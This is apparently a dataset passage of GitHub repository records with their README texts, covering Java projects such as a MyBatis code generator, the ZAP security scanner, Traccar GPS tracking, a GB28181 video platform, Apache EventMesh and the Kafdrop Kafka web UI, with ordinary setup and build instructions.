This tool only supports the two most recent Java LTS versions, JDK 8 and JDK 11
* JDK 1.8 must be version 1.8.0.60 or later
* Java 11 has no specific version requirement
### Running a prebuilt binary (optional)
Running from an IDE is recommended. If you need a binary installer, follow the WeChat public account to get one; Windows and macOS are currently supported. Make sure your JDK is 1.8 with a version above 1.8.0.60
### Launching the software
* Option 1: follow the WeChat public account “搬砖头也要有态度” and reply “GUI” to get a download link
![image](https://user-images.githubusercontent.com/3505708/61360019-2893dc00-a8b0-11e9-8dc9-a020e997ab87.png)
* Option 2: build it yourself
```bash
git clone https://github.com/zouzg/mybatis-generator-gui
cd mybatis-generator-gui
mvn jfx:jar
cd target/jfx/app/
java -jar mybatis-generator-gui.jar
```
* Option 3: run from an IDE
Start it from Eclipse or IntelliJ IDEA: find the `com.zzg.mybatis.generator.MainUI` class and run it (make sure the JDK your IDE runs on meets the version requirement)
* Option 4: package it as a native application and launch it from a shortcut with a double click
If you don't want the installer to use Java's grey coffee-cup logo, uncomment the icon entry for your operating system in the pom file
```bash
# ${project.basedir}/package/windows/mybatis-generator-gui.ico is used for Windows
# ${project.basedir}/package/macosx/mybatis-generator-gui.icns is used for macOS
mvn jfx:native
```
Also note that packaging an exe on Windows requires WiX Toolset 3+. Because the JRE is bundled into the installer, the package is around 100 MB on both platforms, so please build it yourself; the resulting installer is placed under target/jfx/native
### Notes
* This generator is only meant for single-table CRUD code; for queries that join multiple tables, please write new XML and Mapper files yourself;
* On some systems text cannot be typed into the input fields while a Chinese input method is active; switch to an English input method;
* If a field or option is unclear, hover the cursor over the field or its label for a moment and a tooltip will appear if one is available;
### Documentation
For more detailed documentation, see this repository's wiki
* [Usage](https://github.com/astarring/mybatis-generator-gui/wiki/Usage-Guide)
### Contributing
This tool started out as something I used in my own projects and found very useful, so I open-sourced it. If you find it useful and want to improve it, you can:
* Propose features you consider useful in an issue, and I will try to implement them
* Report bugs in an issue, following the format below
* How to reproduce the bug, including your operating system, JDK version, and database type and version
* Screenshots of any errors are even better
* For common problems such as database connection failures or the application not starting, please read the documentation above carefully first; if that doesn't help, ask in the group below (provide as much information as possible, since nobody can help from just a couple of lines of text).
### QQ group
Since some users may not be able to use QQ, I have set up a DingTalk group for discussion, group number 35412531 (the original QQ group is no longer offered, as QQ is inconvenient to open)
- - -
Licensed under the Apache 2.0 License
Copyright 2017 by Owen Zou
"
apache/cassandra,trunk,8509,3537,2009-05-21T02:10:09Z,429171,474,Mirror of Apache Cassandra,cassandra database java,
zaproxy/zaproxy,main,11967,2189,2015-06-03T16:55:01Z,196935,810,The ZAP core project,appsec dast hacktoberfest security security-scanner zap zap-development zaproxy,"# [![](https://raw.githubusercontent.com/wiki/zaproxy/zaproxy/images/zap32x32.png) ZAP](https://www.zaproxy.org)
[![License](https://img.shields.io/badge/license-Apache%202-4EB1BA.svg)](https://www.apache.org/licenses/LICENSE-2.0.html)
[![GitHub release](https://img.shields.io/github/release/zaproxy/zaproxy.svg)](https://www.zaproxy.org/download/)
[![Java CI](https://github.com/zaproxy/zaproxy/actions/workflows/ci.yml/badge.svg)](https://github.com/zaproxy/zaproxy/actions/workflows/ci.yml)
[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/24/badge)](https://bestpractices.coreinfrastructure.org/projects/24)
[![Github Releases](https://img.shields.io/github/downloads/zaproxy/zaproxy/latest/total.svg?maxAge=2592000)](https://zapbot.github.io/zap-mgmt-scripts/downloads.html)
[![javadoc](https://javadoc.io/badge2/org.zaproxy/zap/javadoc.svg)](https://javadoc.io/doc/org.zaproxy/zap)
[![CodeQL](https://github.com/zaproxy/zaproxy/actions/workflows/codeql.yml/badge.svg)](https://github.com/zaproxy/zaproxy/actions/workflows/codeql.yml)
[![Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=zaproxy_zaproxy&metric=alert_status)](https://sonarcloud.io/dashboard?id=zaproxy_zaproxy)
[![Open Source Helpers](https://www.codetriage.com/zaproxy/zaproxy/badges/users.svg)](https://www.codetriage.com/zaproxy/zaproxy)
[![Twitter Follow](https://img.shields.io/twitter/follow/zaproxy.svg?style=social&label=Follow&maxAge=2592000)](https://twitter.com/zaproxy)
![Integration Tests](https://github.com/zaproxy/zaproxy/actions/workflows/run-integration-tests.yml/badge.svg)
![Docker Live Release](https://github.com/zaproxy/zaproxy/actions/workflows/release-live-docker.yml/badge.svg)
The Zed Attack Proxy (ZAP) is one of the world’s most popular free security tools and is actively maintained by a dedicated international team of volunteers. It can help you automatically find security vulnerabilities in your web applications while you are developing and testing your applications. It's also a great tool for experienced pentesters to use for manual security testing.
[![](https://raw.githubusercontent.com/wiki/zaproxy/zaproxy/images/ZAP-Download.png)](https://www.zaproxy.org/download/)
For more details about ZAP see the new ZAP website at [zaproxy.org](https://www.zaproxy.org/)
[![](https://raw.githubusercontent.com/wiki/zaproxy/zaproxy/images/zap-website.png)](https://www.zaproxy.org/)
"
traccar/traccar,master,4784,2454,2012-04-16T08:33:49Z,22190,476,Traccar GPS Tracking System,gps gps-tracking hacktoberfest java traccar,"# [Traccar](https://www.traccar.org)
## Overview
Traccar is an open source GPS tracking system. This repository contains the Java-based back-end service. It supports more than 200 GPS protocols and more than 2000 models of GPS tracking devices. Traccar can be used with any major SQL database system. It also provides an easy-to-use [REST API](https://www.traccar.org/traccar-api/).
Other parts of Traccar solution include:
- [Traccar web app](https://github.com/traccar/traccar-web)
- [Traccar Manager Android app](https://github.com/traccar/traccar-manager-android)
- [Traccar Manager iOS app](https://github.com/traccar/traccar-manager-ios)
There is also a set of mobile apps that you can use for tracking mobile devices:
- [Traccar Client Android app](https://github.com/traccar/traccar-client-android)
- [Traccar Client iOS app](https://github.com/traccar/traccar-client-ios)
## Features
Some of the available features include:
- Real-time GPS tracking
- Driver behaviour monitoring
- Detailed and summary reports
- Geofencing functionality
- Alarms and notifications
- Account and device management
- Email and SMS support
## Build
Please read [build from source documentation](https://www.traccar.org/build/) on the official website.
## Team
- Anton Tananaev ([anton@traccar.org](mailto:anton@traccar.org))
- Andrey Kunitsyn ([andrey@traccar.org](mailto:andrey@traccar.org))
## License
Apache License, Version 2.0
Licensed under the Apache License, Version 2.0 (the ""License"");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an ""AS IS"" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"
648540858/wvp-GB28181-pro,master,4343,1324,2020-11-14T14:16:37Z,43910,67,WEB VIDEO PLATFORM是一个基于GB28181-2016标准实现的网络视频平台,支持NAT穿透,支持海康、大华、宇视等品牌的IPC、NVR、DVR接入。支持国标级联,支持rtsp/rtmp等视频流转发到国标平台,支持rtsp/rtmp等推流转发到国标平台。,28181 28181web gb28181 gb28181server wvp,"![logo](doc/_media/logo.png)
# An out-of-the-box GB28181 video platform
[![Build Status](https://travis-ci.org/xia-chu/ZLMediaKit.svg?branch=master)](https://travis-ci.org/xia-chu/ZLMediaKit)
[![license](http://img.shields.io/badge/license-MIT-green.svg)](https://github.com/xia-chu/ZLMediaKit/blob/master/LICENSE)
[![JAVA](https://img.shields.io/badge/language-java-red.svg)](https://en.cppreference.com/)
[![platform](https://img.shields.io/badge/platform-linux%20|%20macos%20|%20windows-blue.svg)](https://github.com/xia-chu/ZLMediaKit)
[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-yellow.svg)](https://github.com/xia-chu/ZLMediaKit/pulls)
WEB VIDEO PLATFORM is an out-of-the-box network video platform built on the GB28181-2016 standard. It implements the core signaling and device-management back end, supports NAT traversal, and accepts IPCs and NVRs from Hikvision, Dahua, Uniview and other vendors. It supports GB (national standard) cascading and can forward cameras, live streams and pushed streams that lack GB28181 support to other GB platforms.
The streaming media service is based on ZLMediaKit by @夏楚 [https://github.com/ZLMediaKit/ZLMediaKit](https://github.com/ZLMediaKit/ZLMediaKit)
The player is jessibuca by @dexter [https://github.com/langhuihui/jessibuca/tree/v3](https://github.com/langhuihui/jessibuca/tree/v3)
The front-end pages are adapted from MediaServerUI by @Kyle [https://gitee.com/kkkkk5G/MediaServerUI](https://gitee.com/kkkkk5G/MediaServerUI).
# Use cases:
Plug-in-free playback of camera video in the browser.
Access for GB28181 devices (cameras, platforms, NVRs, etc.)
Access for non-GB devices (ONVIF, RTSP, RTMP, live-streaming devices, etc.), making full use of existing equipment.
GB cascading, multi-platform cascading, and cross-network video preview.
Platform interconnection across network isolation gateways.
# Documentation
wvp user documentation [https://doc.wvp-pro.cn](https://doc.wvp-pro.cn)
ZLM user documentation [https://github.com/ZLMediaKit/ZLMediaKit](https://github.com/ZLMediaKit/ZLMediaKit)
# Paid community
[![社群](doc/_media/shequ.png ""shequ"")](https://t.zsxq.com/0d8VAD3Dm)
> The fee pays for better support and is also a bigger incentive for the author. Three days after joining the planet you can send me your WeChat ID in a private message and I will add you to the group. If you are not satisfied within the first three days you can get a refund directly, so there is no need to worry; trying it for three days for free is also fine.
# Gitee mirror repository
https://gitee.com/pan648540858/wvp-GB28181-pro.git
# Screenshots
![index](doc/_media/index.png ""index.png"")
![2](doc/_media/2.png ""2.png"")
![3](doc/_media/3.png ""3.png"")
![3-1](doc/_media/3-1.png ""3-1.png"")
![3-2](doc/_media/3-2.png ""3-2.png"")
![3-3](doc/_media/3-3.png ""3-3.png"")
![build_1](https://images.gitee.com/uploads/images/2022/0304/101919_ee5b8c79_1018729.png ""2022-03-04_10-13.png"")
# Features
- [X] Integrated web UI
- [X] Good compatibility
- [X] Electronic map support; accepts both WGS84 and GCJ02 coordinate systems and automatically converts to the appropriate one for display and distribution
- [X] Device access
- [X] Video preview
- [X] Switching between main and sub streams
- [X] No limit on the number of channels; how many devices you can connect depends only on your server's capacity
- [X] PTZ control: pan/tilt, zoom in and zoom out
- [X] Query, use and set presets
- [X] Query and play back recordings on NVR/IPC, with playback and download from a specified time
- [X] Automatically stop streams with no viewers to save bandwidth
- [X] Synchronization of video device information
- [X] Online/offline monitoring
- [X] Direct output of stream addresses in RTSP, RTMP, HTTP-FLV, Websocket-FLV and HLS
- [X] Watch a camera directly through a single stream URL, without logging in or calling any API
- [X] Both UDP and TCP transport for GB signaling
- [X] Both UDP and TCP transport for GB media streams
- [X] Search and channel filtering
- [X] Query of channel sub-directories
- [X] Audio filtering to keep noise from disturbing viewing
- [X] GB network time synchronization
- [X] Playback of H.264 and H.265
- [X] Alarm handling, with alarm messages pushed to the front end
- [X] Two-way audio (intercom)
- [X] Subscription and notification methods
- [X] Mobile position subscription
- [X] Mobile position notification handling
- [X] Alarm event subscription
- [X] Alarm event notification handling
- [X] Device catalog subscription
- [X] Device catalog notification handling
- [X] Mobile position query and display
- [X] Manually add devices and set per-device passwords
- [X] Platform-to-platform access
- [X] GB cascading
- [X] Cascade GB channels to upper-level platforms
- [X] Add upper-level platforms from the web UI
- [X] Registration
- [X] Heartbeat keep-alive
- [X] Channel selection
- [X] Channel push
- [X] On-demand play
- [X] PTZ control
- [X] Platform status query
- [X] Platform information query
- [X] Remote platform start
- [X] Customizable virtual catalog per cascaded platform
- [X] Catalog subscription and notification
- [X] Recording viewing and playback
- [X] GPS subscription and notification (live push streams)
- [X] Two-way audio (intercom)
- [X] Automatic configuration of the ZLM media service, reducing problems caused by misconfiguration;
- [X] Multiple media nodes, with the least-loaded node selected automatically.
- [X] Optional UDP multi-port mode to improve media transfer performance over UDP;
- [X] Deployment on the public internet;
- [X] Separate deployment of wvp and ZLM to increase platform concurrency
- [X] Pull RTSP/RTMP streams, distribute them in various formats, or push them to other GB platforms
- [X] Accept pushed RTSP/RTMP streams, distribute them in various formats, or push them to other GB platforms
- [X] Push-stream authentication
- [X] API authentication
- [X] Cloud recording: pushed, proxied and GB video can all be recorded on the cloud server, with preview and download
- [X] Packaging as an executable jar or war
- [X] Cross-origin requests and separate front-end/back-end deployment
- [X] Support for MySQL, PostgreSQL, Kingbase and other databases
- [X] ONVIF support (currently on the onvif branch; requires installing the ONVIF service, available from the Knowledge Planet)
# Non-open-source content
- [X] ONVIF device access, with on-demand play, PTZ control, GB cascaded play and automatic play. A trial installer and tutorial are available on [知识星球](https://t.zsxq.com/10WAnH2MP) with no time limit; if you need the source code, message me on the planet or contact me by email.
- [X] GB28181-2022 protocol support, including cruise track query, precise PTZ control, storage card formatting, device firmware upgrade, OSD configuration, H.265 + AAC, sub-stream support, reverse playback of recordings and more. The full feature list is on [知识星球](https://t.zsxq.com/18GXkpkqs); for source code and testing, message me on the planet or send me an email
# License
The project's own code is released under the permissive MIT license and can be used freely in commercial and non-commercial projects as long as the copyright notice is retained. The project also uses small pieces of other open-source code; please replace or remove them yourself for commercial use. Any commercial disputes or infringement arising from use of this project are unrelated to the project and its developers; you bear the legal risk yourself. When using this project's code, the licenses of the third-party libraries it depends on should also be stated in your own license terms.
# Technical support
Column list on [知识星球](https://t.zsxq.com/0d8VAD3Dm):
- [Getting started, part 1: what WVP-PRO can do](https://t.zsxq.com/0dLguVoSp)
For paid technical support, send an email to 648540858@qq.com
# Acknowledgements
Thanks to [夏楚](https://github.com/xia-chu) for providing such a great open-source streaming media framework and for the support and help during development.
Thanks to [dexter langhuihui](https://github.com/langhuihui) for open-sourcing such a handy web player.
Thanks to [Kyle](https://gitee.com/kkkkk5G) for open-sourcing the easy-to-use front-end pages
Thanks to everyone for their sponsorship, corrections and help with the project, including but not limited to code contributions, issue reports and donations! In no particular order:
[lawrencehj](https://github.com/lawrencehj) [Smallwhitepig](https://github.com/Smallwhitepig) [swwhaha](https://github.com/swwheihei)
[hotcoffie](https://github.com/hotcoffie) [xiaomu](https://github.com/nikmu) [TristingChen](https://github.com/TristingChen)
[chenparty](https://github.com/chenparty) [Hotleave](https://github.com/hotleave) [ydwxb](https://github.com/ydwxb)
[ydpd](https://github.com/ydpd) [szy833](https://github.com/szy833) [ydwxb](https://github.com/ydwxb) [Albertzhu666](https://github.com/Albertzhu666)
[mk1990](https://github.com/mk1990) [SaltFish001](https://github.com/SaltFish001)
Thanks also to JetBrains for supporting open-source projects; this project is developed and debugged with IntelliJ IDEA:
![JetBrains](https://resources.jetbrains.com/storage/products/company/brand/logos/IntelliJ_IDEA_icon.svg?_ga=2.143694769.529214288.1712023294-439039083.1711422571&_gl=1*102dv9n*_ga*NDM5MDM5MDgzLjE3MTE0MjI1NzE.*_ga_9J976DJZ68*MTcxMjEyNjg4NC45LjEuMTcxMjEyNzc2My4zMy4wLjA.)
"
apache/eventmesh,master,1539,614,2019-09-16T03:04:56Z,66016,272,EventMesh is a new generation serverless event middleware for building distributed event-driven applications.,cloud-native cqrs esb event-connector event-driven event-gateway event-governance event-mesh event-sourcing event-streaming hacktoberfest message-bus microservice multi-runtime pubsub serverless serverless-workflow,"
# Apache EventMesh
**Apache EventMesh** is a new generation serverless event middleware for building distributed [event-driven](https://en.wikipedia.org/wiki/Event-driven_architecture) applications.
### EventMesh Architecture
![EventMesh Architecture](resources/eventmesh-architecture-4.png)
### EventMesh Dashboard
![EventMesh Dashboard](resources/dashboard.png)
## Features
Apache EventMesh has a vast number of features to help users achieve their goals. Let us share with you some of the key features EventMesh has to offer:
- Built around the [CloudEvents](https://cloudevents.io) specification (see the sketch after this list).
- Rapidly extensible interconnector layer of [connectors](https://github.com/apache/eventmesh/tree/master/eventmesh-connectors) using [openConnect](https://github.com/apache/eventmesh/tree/master/eventmesh-openconnect), such as sources or sinks for SaaS, cloud services, databases, etc.
- Rapidly extensible storage layer such as [Apache RocketMQ](https://rocketmq.apache.org), [Apache Kafka](https://kafka.apache.org), [Apache Pulsar](https://pulsar.apache.org), [RabbitMQ](https://rabbitmq.com), [Redis](https://redis.io).
- Rapidly extensible meta layer such as [Consul](https://consulproject.org/en/), [Nacos](https://nacos.io), [ETCD](https://etcd.io) and [Zookeeper](https://zookeeper.apache.org/).
- Guaranteed at-least-once delivery.
- Deliver events between multiple EventMesh deployments.
- Event schema management by catalog service.
- Powerful event orchestration by [Serverless workflow](https://serverlessworkflow.io/) engine.
- Powerful event filtering and transformation.
- Rapid, seamless scalability.
- Easy function development and framework integration.
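As a rough illustration of the CloudEvents orientation mentioned above, an event can be assembled with the CloudEvents Java SDK before being handed to an EventMesh producer; the builder calls below are standard `cloudevents-core` API, the attribute values are placeholders, and the hand-off to EventMesh itself is omitted.
```java
import java.net.URI;
import java.util.UUID;

import io.cloudevents.CloudEvent;
import io.cloudevents.core.builder.CloudEventBuilder;

public class EventSketch {
    public static void main(String[] args) {
        // Attribute values are placeholders; only the builder API comes from the CloudEvents Java SDK.
        CloudEvent event = CloudEventBuilder.v1()
                .withId(UUID.randomUUID().toString())
                .withSource(URI.create(""/demo/publisher""))
                .withType(""org.example.demo.event"")
                .withDataContentType(""text/plain"")
                .withData(""hello eventmesh"".getBytes())
                .build();
        System.out.println(event);
    }
}
```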
## Roadmap
Please go to the [roadmap](https://eventmesh.apache.org/docs/roadmap) to get the release history and new features of Apache EventMesh.
## Subprojects
- [EventMesh-site](https://github.com/apache/eventmesh-site): Apache official website resources for EventMesh.
- [EventMesh-workflow](https://github.com/apache/eventmesh-workflow): Serverless workflow runtime for event Orchestration on EventMesh.
- [EventMesh-dashboard](https://github.com/apache/eventmesh-dashboard): Operation and maintenance console of EventMesh.
- [EventMesh-catalog](https://github.com/apache/eventmesh-catalog): Catalog service for event schema management using AsyncAPI.
- [EventMesh-go](https://github.com/apache/eventmesh-go): A go implementation for EventMesh runtime.
## Quick start
This section of the guide will show you the steps to deploy EventMesh from [Local](#run-eventmesh-runtime-locally), [Docker](#run-eventmesh-runtime-in-docker), [K8s](#run-eventmesh-runtime-in-kubernetes).
This section guides you through launching EventMesh with the default configuration; if you need more detailed EventMesh deployment steps, please visit the [EventMesh official document](https://eventmesh.apache.org/docs/introduction).
### Deployment Event Store
> EventMesh supports [multiple Event Stores](https://eventmesh.apache.org/docs/roadmap#event-store-implementation-status); the default storage mode is `standalone` and does not rely on an external event store.
### Run EventMesh Runtime locally
#### 1. Download EventMesh
Download the latest version of the Binary Distribution from the [EventMesh Download](https://eventmesh.apache.org/download/) page and extract it:
```shell
wget https://dlcdn.apache.org/eventmesh/1.10.0/apache-eventmesh-1.10.0-bin.tar.gz
tar -xvzf apache-eventmesh-1.10.0-bin.tar.gz
cd apache-eventmesh-1.10.0
```
#### 2. Run EventMesh
Execute the `start.sh` script to start the EventMesh Runtime server.
```shell
bash bin/start.sh
```
View the output log:
```shell
tail -n 50 -f logs/eventmesh.out
```
When the log output shows server `state:RUNNING`, it means EventMesh Runtime has started successfully.
You can stop the run with the following command:
```shell
bash bin/stop.sh
```
When the script prints `shutdown server ok!`, it means EventMesh Runtime has stopped.
### Run EventMesh Runtime in Docker
#### 1. Pull EventMesh Image
Use the following command line to download the latest version of [EventMesh](https://hub.docker.com/r/apache/eventmesh):
```shell
sudo docker pull apache/eventmesh:latest
```
#### 2. Run and Manage EventMesh Container
Use the following command to start the EventMesh container:
```shell
sudo docker run -d --name eventmesh -p 10000:10000 -p 10105:10105 -p 10205:10205 -p 10106:10106 -t apache/eventmesh:latest
```
Enter the container:
```shell
sudo docker exec -it eventmesh /bin/bash
```
View the log:
```shell
cd logs
tail -n 50 -f eventmesh.out
```
### Run EventMesh Runtime in Kubernetes
#### 1. Deploy operator
Run the following commands (to delete a deployment, simply replace `deploy` with `undeploy`):
```shell
$ cd eventmesh-operator && make deploy
```
Run `kubectl get pods` and `kubectl get crd | grep eventmesh-operator.eventmesh` to see the status of the deployed eventmesh-operator.
```shell
$ kubectl get pods
NAME READY STATUS RESTARTS AGE
eventmesh-operator-59c59f4f7b-nmmlm 1/1 Running 0 20s
$ kubectl get crd | grep eventmesh-operator.eventmesh
connectors.eventmesh-operator.eventmesh 2024-01-10T02:40:27Z
runtimes.eventmesh-operator.eventmesh 2024-01-10T02:40:27Z
```
#### 2. Deploy EventMesh Runtime
Execute the following command to deploy the runtime and connector-rocketmq (to delete, simply replace `create` with `delete`):
```shell
$ make create
```
Run `kubectl get pods` to see if the deployment was successful.
```shell
NAME READY STATUS RESTARTS AGE
connector-rocketmq-0 1/1 Running 0 9s
eventmesh-operator-59c59f4f7b-nmmlm 1/1 Running 0 3m12s
eventmesh-runtime-0-a-0 1/1 Running 0 15s
```
## Contributing
Each contributor has played an important role in promoting the robust development of Apache EventMesh. We sincerely appreciate all contributors who have contributed code and documents.
- [Contributing Guideline](https://eventmesh.apache.org/community/contribute/contribute)
- [Good First Issues](https://github.com/apache/eventmesh/issues?q=is%3Aopen+is%3Aissue+label%3A%22good+first+issue%22)
Here is the [List of Contributors](https://github.com/apache/eventmesh/graphs/contributors), thank you all! :)
## CNCF Landscape
## License
Apache EventMesh is licensed under the [Apache License, Version 2.0](http://www.apache.org/licenses/LICENSE-2.0.html).
## Community
| WeChat Assistant | WeChat Public Account | Slack |
|---------------------------------------------------------|--------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------|
| | | [Join Slack Chat](https://join.slack.com/t/the-asf/shared_invite/zt-1y375qcox-UW1898e4kZE_pqrNsrBM2g)(Please open an issue if this link is expired) |
Bi-weekly meeting : [#Tencent meeting](https://meeting.tencent.com/dm/wes6Erb9ioVV) : 346-6926-0133
Bi-weekly meeting record : [bilibili](https://space.bilibili.com/1057662180)
### Mailing List
| Name | Description | Subscribe | Unsubscribe | Archive |
|-------------|---------------------------------------------------------|------------------------------------------------------------|----------------------------------------------------------------|----------------------------------------------------------------------------------|
| Users | User discussion | [Subscribe](mailto:users-subscribe@eventmesh.apache.org) | [Unsubscribe](mailto:users-unsubscribe@eventmesh.apache.org) | [Mail Archives](https://lists.apache.org/list.html?users@eventmesh.apache.org) |
| Development | Development discussion (Design Documents, Issues, etc.) | [Subscribe](mailto:dev-subscribe@eventmesh.apache.org) | [Unsubscribe](mailto:dev-unsubscribe@eventmesh.apache.org) | [Mail Archives](https://lists.apache.org/list.html?dev@eventmesh.apache.org) |
| Commits | Commits to related repositories | [Subscribe](mailto:commits-subscribe@eventmesh.apache.org) | [Unsubscribe](mailto:commits-unsubscribe@eventmesh.apache.org) | [Mail Archives](https://lists.apache.org/list.html?commits@eventmesh.apache.org) |
| Issues | Issues or PRs comments and reviews | [Subscribe](mailto:issues-subscribe@eventmesh.apache.org) | [Unsubscribe](mailto:issues-unsubscribe@eventmesh.apache.org) | [Mail Archives](https://lists.apache.org/list.html?issues@eventmesh.apache.org) |
"
obsidiandynamics/kafdrop,master,5171,797,2019-05-27T08:46:56Z,2781,45,Kafka Web UI,consumer-group consumer-producer docker event-sourcing event-streaming kafka kafka-tools kafka-ui kafka-utils kubernetes pub-sub topic web-ui zookeeper," Kafdrop – Kafka Web UI [![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?url=https%3A%2F%2Fgithub.com%2Fobsidiandynamics%2Fkafdrop&text=Get%20Kafdrop%20%E2%80%94%20a%20web-based%20UI%20for%20viewing%20%23ApacheKafka%20topics%20and%20browsing%20consumers%20)
===
[![Price](https://img.shields.io/badge/price-FREE-0098f7.svg)](https://github.com/obsidiandynamics/kafdrop/blob/master/LICENSE)
[![Release with mvn](https://github.com/obsidiandynamics/kafdrop/actions/workflows/master.yml/badge.svg)](https://github.com/obsidiandynamics/kafdrop/actions/workflows/master.yml)
[![Docker](https://img.shields.io/docker/pulls/obsidiandynamics/kafdrop.svg)](https://hub.docker.com/r/obsidiandynamics/kafdrop)
[![Language grade: Java](https://img.shields.io/lgtm/grade/java/g/obsidiandynamics/kafdrop.svg?logo=lgtm&logoWidth=18)](https://lgtm.com/projects/g/obsidiandynamics/kafdrop/context:java)
Kafdrop is a web UI for viewing Kafka topics and browsing consumer groups. The tool displays information such as brokers, topics, partitions, consumers, and lets you view messages.
![Overview Screenshot](docs/images/overview.png?raw=true)
This project is a reboot of Kafdrop 2.x, dragged kicking and screaming into the world of Java 17+, Kafka 2.x, Helm and Kubernetes. It's a lightweight application that runs on Spring Boot and is dead-easy to configure, supporting SASL and TLS-secured brokers.
# Features
* **View Kafka brokers** — topic and partition assignments, and controller status
* **View topics** — partition count, replication status, and custom configuration
* **Browse messages** — JSON, plain text, Avro and Protobuf encoding
* **View consumer groups** — per-partition parked offsets, combined and per-partition lag
* **Create new topics**
* **View ACLs**
* **Support for Azure Event Hubs**
# Requirements
* Java 17 or newer
* Kafka (version 0.11.0 or newer) or Azure Event Hubs
Optional, additional integration:
* Schema Registry
# Getting Started
You can run the Kafdrop JAR directly, via Docker, or in Kubernetes.
## Running from JAR
```sh
java --add-opens=java.base/sun.nio.ch=ALL-UNNAMED \
-jar target/kafdrop-.jar \
--kafka.brokerConnect=,...
```
If unspecified, `kafka.brokerConnect` defaults to `localhost:9092`.
**Note:** As of Kafdrop 3.10.0, a ZooKeeper connection is no longer required. All necessary cluster information is retrieved via the Kafka admin API.
Open a browser and navigate to [http://localhost:9000](http://localhost:9000). The port can be overridden by adding the following config:
```
--server.port= --management.server.port=
```
Optionally, configure a schema registry connection with:
```
--schemaregistry.connect=http://localhost:8081
```
and if you also require basic auth for your schema registry connection you should add:
```
--schemaregistry.auth=username:password
```
Finally, a default message and key format (e.g. to deserialize Avro messages or keys) can optionally be configured as follows:
```
--message.format=AVRO
--message.keyFormat=DEFAULT
```
Valid format values are `DEFAULT`, `AVRO`, `PROTOBUF`. This can also be configured at the topic level via dropdown when viewing messages.
If key format is unspecified, message format will be used for key too.
## Configure Protobuf message type
### Option 1: Using Protobuf Descriptor
For the protobuf message type, the definition of a message can be compiled and transmitted using a descriptor file.
Thus, in order for Kafdrop to recognize the message, the application needs access to the descriptor file(s).
Kafdrop lets the user select a descriptor, as well as specify the name of one of the message types provided by that descriptor, at runtime.
To configure a folder with protobuf descriptor file(s) (.desc), use:
```
--protobufdesc.directory=/var/protobuf_desc
```
### Option 2 : Using Schema Registry
If no protobuf descriptor file is supplied, the implementation will attempt to create the protobuf deserializer using the schema registry instead.
### Defaulting to Protobuf
If preferred, the default message format can be set to Protobuf as follows:
```
--message.format=PROTOBUF
```
## Running with Docker
Images are hosted at [hub.docker.com/r/obsidiandynamics/kafdrop](https://hub.docker.com/r/obsidiandynamics/kafdrop).
Launch container in background:
```sh
docker run -d --rm -p 9000:9000 \
-e KAFKA_BROKERCONNECT= \
-e SERVER_SERVLET_CONTEXTPATH=""/"" \
obsidiandynamics/kafdrop
```
Launch container with some specific JVM options:
```sh
docker run -d --rm -p 9000:9000 \
-e KAFKA_BROKERCONNECT= \
-e JVM_OPTS=""-Xms32M -Xmx64M"" \
-e SERVER_SERVLET_CONTEXTPATH=""/"" \
obsidiandynamics/kafdrop
```
Launch container in background with protobuf definitions:
```sh
docker run -d --rm -v :/var/protobuf_desc -p 9000:9000 \
-e KAFKA_BROKERCONNECT= \
-e SERVER_SERVLET_CONTEXTPATH=""/"" \
-e CMD_ARGS=""--message.format=PROTOBUF --protobufdesc.directory=/var/protobuf_desc"" \
obsidiandynamics/kafdrop
```
Then access the web UI at [http://localhost:9000](http://localhost:9000).
> **Hey there!** We hope you really like Kafdrop! Please take a moment to [⭐](https://github.com/obsidiandynamics/kafdrop)the repo or [Tweet](https://twitter.com/intent/tweet?url=https%3A%2F%2Fgithub.com%2Fobsidiandynamics%2Fkafdrop&text=Get%20Kafdrop%20%E2%80%94%20a%20web-based%20UI%20for%20viewing%20%23ApacheKafka%20topics%20and%20browsing%20consumers%20) about it.
## Running in Kubernetes (using a Helm Chart)
Clone the repository (if necessary):
```sh
git clone https://github.com/obsidiandynamics/kafdrop && cd kafdrop
```
Apply the chart:
```sh
helm upgrade -i kafdrop chart --set image.tag=3.x.x \
--set kafka.brokerConnect= \
--set server.servlet.contextPath=""/"" \
--set cmdArgs=""--message.format=AVRO --schemaregistry.connect=http://localhost:8080"" \ #optional
--set jvm.opts=""-Xms32M -Xmx64M""
```
For all Helm configuration options, have a peek into [chart/values.yaml](chart/values.yaml).
Replace `3.x.x` with the image tag of [obsidiandynamics/kafdrop](https://hub.docker.com/r/obsidiandynamics/kafdrop). Services will be bound on port 9000 by default (node port 30900).
**Note:** The context path _must_ begin with a slash.
Proxy to the Kubernetes cluster:
```sh
kubectl proxy
```
Navigate to [http://localhost:8001/api/v1/namespaces/default/services/http:kafdrop:9000/proxy](http://localhost:8001/api/v1/namespaces/default/services/http:kafdrop:9000/proxy).
### Protobuf support via helm chart:
To install with protobuf support, the deployment provides a ""facility"" option, _mountProtoDesc_, for mounting the descriptor files folder and passing the required CMD arguments.
Example:
```sh
helm upgrade -i kafdrop chart --set image.tag=3.x.x \
--set kafka.brokerConnect= \
--set server.servlet.contextPath=""/"" \
--set mountProtoDesc.enabled=true \
--set mountProtoDesc.hostPath="""" \
--set jvm.opts=""-Xms32M -Xmx64M""
```
## Building
After cloning the repository, building is just a matter of running a standard Maven build:
```sh
$ mvn clean package
```
The following command will generate a Docker image:
```sh
mvn assembly:single docker:build
```
## Docker Compose
There is a `docker-compose.yaml` file that bundles a Kafka/ZooKeeper instance with Kafdrop:
```sh
cd docker-compose/kafka-kafdrop
docker-compose up
```
# APIs
## JSON endpoints
Starting with version 2.0.0, Kafdrop offers a set of Kafka APIs that mirror the existing HTML views. Any existing endpoint can be returned as JSON by simply setting the `Accept: application/json` header. Some endpoints are JSON only:
* `/topic`: Returns a list of all topics.
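For example, the topic list can be fetched as JSON with any HTTP client; this sketch uses the JDK 11+ `HttpClient` and assumes Kafdrop is listening on the default port 9000.
```java
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;

public class TopicList {
    public static void main(String[] args) throws Exception {
        HttpClient client = HttpClient.newHttpClient();
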